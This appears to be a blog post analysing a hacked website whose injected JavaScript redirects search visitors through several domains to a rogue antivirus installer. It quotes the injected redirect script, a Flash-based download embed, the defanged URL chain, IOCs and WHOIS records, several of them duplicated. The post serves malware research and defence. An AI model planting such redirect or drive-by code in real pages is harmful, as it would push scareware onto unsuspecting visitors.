The Live.com query was for nothing more nefarious than a cupcake recipe, and the infected domain, regishouse.org, a hacked participant.
If we look at the regishouse.org source code, we immediately notice the following;
<center>
<script language=javascript>window.location=encodeURI("http://gje.stakeshouse.cn/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX"); </script>
</center>
<img src="1.jpg" height="100%" width="100%">
<script language=javascript>window.location=encodeURI("http://gje.stakeshouse.cn/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX"); </script>
</center>
<img src="1.jpg" height="100%" width="100%">
Following this URL sends us through a couple of redirects, with the final destination apparently varying. I didn't record the first time I followed it, but the report I received showed the following;
hxxp://gje.stakeshouse.cn/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref=http%253A%252F%252Fsearch.live.com%252Fresults.aspx%253Fq%253DCrave%252BCupcakes%252BRecipe%2526FORM%253DQSRE3¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=hxxp%253A%252F%252Fregishouse.org%252Ftemplates%252Fwaccamaw-kennels%252Fcrave-cupcake-recipe.html&default_keyword=XXX
hxxp://autoperformspec.com/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref=hxxp%25253A%25252F%25252Fsearch.live.com%25252Fresults.aspx%25253Fq%25253DCrave%25252BCupcakes%25252BRecipe%252526FORM%25253DQSRE3¶meter=$keyword&se=$se&ur=1&hxxp_REFERER=hxxp%25253A%25252F%25252Fregishouse.org%25252Ftemplates%25252Fwaccamaw-kennels%25252Fcrave-cupcake-recipe.html&default_keyword=XXX
hxxp://dumake.cn/private-nonadult.html
hxxp://autoperformspec.com/in.cgi?17&private2=nonadult
hxxp://crownsafetytool.com/hitin.php?land=30&affid=02086
hxxp://autoperformspec.com/in.cgi?17&private4=nonadultexe
hxxp://updateserversoftware.com/update/?419dfa758bc79bd5dbabf30a392cd0db
hxxp://dumake.cn/favicon.ico
The second time I followed this, in order to document it for you fine folks, I was finally taken from gje.stakeshouse.cn through;
hxxp://autoperformspec.com/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref=%22+encodeURIComponent(document.referrer)+%22¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=%22+encodeURIComponent(document.URL)+%22&default_keyword=XXX
hxxp://crownsafetytool.com/hitin.php?land=30&affid=02086
hxxp://crownsafetytool.com/scan.php?affid=02086
Now I'm not saying they're paranoid but, apparently these fine folks want to ensure you're using Flash, presumably, to make it more difficult to automate analysis (like that's going to work);
function download()
{
// window.location='download.php?affid=02086';
window.document.getElementById('download').innerHTML="<embed src='load.swf?&p=0&t=_self&u=download.php?affid=02086' autostart=true width=1 height=1></embed>";
}
{
// window.location='download.php?affid=02086';
window.document.getElementById('download').innerHTML="<embed src='load.swf?&p=0&t=_self&u=download.php?affid=02086' autostart=true width=1 height=1></embed>";
}
Note the "// " before window.location? This means the site previously used Javascript for the redirect ("//" is the Javascript and PHP "disable this line" tag).
So what does this give us? Why a lovely roguerific piece of crapness called System Security Antivirus (WinWebSecurity variant) of course!
hxxp://crownsafetytool.com/download.php?affid=02086
Which gives us a lovely little file called install.exe (482K - MD5: e8bba2fc1c2f1a89ad73bc897b424e65)
Result: 6/40 (15.00%)
https://www.virustotal.com/analisis/75763a67df6deb27c58338d9da957654
Domains involved:
gje.stakeshouse.cn - 91.212.41.110, 91.212.41.111, 91.212.41.96
autoperformspec.com - 91.212.41.110, 91.212.41.111
dumake.cn - 91.212.41.100
crownsafetytool.com - 209.44.126.22
updateserversoftware.com - 213.182.197.230
Net-blocks involved (recognize them?)
http://hosts-file.net/pest.asp?show=91.212.41
inetnum: 91.212.41.0 - 91.212.41.255
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: RU
org: ORG-LA208-RIPE
admin-c: RM2628-RIPE
tech-c: RM2628-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GAZTRANZITSTROYINFO-MNT
mnt-routes: GAZTRANZITSTROYINFO-MNT
mnt-domains: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered
organisation: ORG-LA208-RIPE
org-name: LLC "Gaztransitstroyinfo"
phone: +7-921-2238843
org-type: OTHER
address: Russia, Sankt Peterburg, Kropotkina 1, office 299
e-mail: gaz@gaztranzitstroyinfo.ru
mnt-ref: GAZTRANZITSTROYINFO-MNT
mnt-by: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered
person: Roman Matveev
address: Russia, Sankt Peterburg, Kropotkina 1, off. 299
mnt-by: GAZTRANZITSTROYINFO-MNT
phone: +7-921-2238843
nic-hdl: RM2628-RIPE
source: RIPE # Filtered
:: Information related to '91.212.41.0/24as29371'
route: 91.212.41.0/24
descr: GAZTRANZITSTROYINFO
origin: as29371
mnt-by: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: RU
org: ORG-LA208-RIPE
admin-c: RM2628-RIPE
tech-c: RM2628-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GAZTRANZITSTROYINFO-MNT
mnt-routes: GAZTRANZITSTROYINFO-MNT
mnt-domains: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered
organisation: ORG-LA208-RIPE
org-name: LLC "Gaztransitstroyinfo"
phone: +7-921-2238843
org-type: OTHER
address: Russia, Sankt Peterburg, Kropotkina 1, office 299
e-mail: gaz@gaztranzitstroyinfo.ru
mnt-ref: GAZTRANZITSTROYINFO-MNT
mnt-by: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered
person: Roman Matveev
address: Russia, Sankt Peterburg, Kropotkina 1, off. 299
mnt-by: GAZTRANZITSTROYINFO-MNT
phone: +7-921-2238843
nic-hdl: RM2628-RIPE
source: RIPE # Filtered
:: Information related to '91.212.41.0/24as29371'
route: 91.212.41.0/24
descr: GAZTRANZITSTROYINFO
origin: as29371
mnt-by: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered
http://hosts-file.net/pest.asp?show=209.44.
OrgName: Netelligent Hosting Services Inc.
OrgID: NHS-31
Address: 1396 Franklin Drive
City: Laval
StateProv: QC
PostalCode: H7W-1K6
Country: CA
NetRange: 209.44.96.0 - 209.44.127.255
CIDR: 209.44.96.0/19
NetName: NETEL-ARIN-BLK02
NetHandle: NET-209-44-96-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.NETELLIGENT.CA
NameServer: NS2.NETELLIGENT.CA
NameServer: NS3.NETELLIGENT.CA
Comment:
RegDate: 2006-08-01
Updated: 2007-03-20
RTechHandle: NETEL1-ARIN
RTechName: Netelligent Ops
RTechPhone: +1-514-369-2209
RTechEmail: ops@netelligent.ca
OrgAbuseHandle: NETEL2-ARIN
OrgAbuseName: Netelligent Abuse
OrgAbusePhone: +1-514-369-2209
OrgAbuseEmail: abuse@netelligent.ca
OrgTechHandle: NETEL1-ARIN
OrgTechName: Netelligent Ops
OrgTechPhone: +1-514-369-2209
OrgTechEmail: ops@netelligent.ca
# ARIN WHOIS database, last updated 2009-03-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database
OrgID: NHS-31
Address: 1396 Franklin Drive
City: Laval
StateProv: QC
PostalCode: H7W-1K6
Country: CA
NetRange: 209.44.96.0 - 209.44.127.255
CIDR: 209.44.96.0/19
NetName: NETEL-ARIN-BLK02
NetHandle: NET-209-44-96-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.NETELLIGENT.CA
NameServer: NS2.NETELLIGENT.CA
NameServer: NS3.NETELLIGENT.CA
Comment:
RegDate: 2006-08-01
Updated: 2007-03-20
RTechHandle: NETEL1-ARIN
RTechName: Netelligent Ops
RTechPhone: +1-514-369-2209
RTechEmail: ops@netelligent.ca
OrgAbuseHandle: NETEL2-ARIN
OrgAbuseName: Netelligent Abuse
OrgAbusePhone: +1-514-369-2209
OrgAbuseEmail: abuse@netelligent.ca
OrgTechHandle: NETEL1-ARIN
OrgTechName: Netelligent Ops
OrgTechPhone: +1-514-369-2209
OrgTechEmail: ops@netelligent.ca
# ARIN WHOIS database, last updated 2009-03-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database
http://hosts-file.net/pest.asp?show=213.182.197.
inetnum: 213.182.197.224 - 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
admin-c: DB8712-RIPE
tech-c: DB8712-RIPE
status: ASSIGNED PA
rev-srv: ns.junik.lv
rev-srv: ns2.junik.lv
mnt-by: AS8206-MNT
source: RIPE # Filtered
person: Danila Berencev
address: Kazakhstan, Almaty , Abay street 2a
abuse-mailbox: abuseemaildhcp@gmail.com
phone: + 87771697576
nic-hdl: DB8712-RIPE
source: RIPE # Filtered
:: Information related to '213.182.192.0/19AS8206'
route: 213.182.192.0/19
descr: JUNIK Riga Network part 2
origin: AS8206
mnt-by: AS8206-MNT
source: RIPE # Filtered
netname: Real_Host_NET1
descr: Real Host
country: LV
admin-c: DB8712-RIPE
tech-c: DB8712-RIPE
status: ASSIGNED PA
rev-srv: ns.junik.lv
rev-srv: ns2.junik.lv
mnt-by: AS8206-MNT
source: RIPE # Filtered
person: Danila Berencev
address: Kazakhstan, Almaty , Abay street 2a
abuse-mailbox: abuseemaildhcp@gmail.com
phone: + 87771697576
nic-hdl: DB8712-RIPE
source: RIPE # Filtered
:: Information related to '213.182.192.0/19AS8206'
route: 213.182.192.0/19
descr: JUNIK Riga Network part 2
origin: AS8206
mnt-by: AS8206-MNT
source: RIPE # Filtered
No comments:
Post a Comment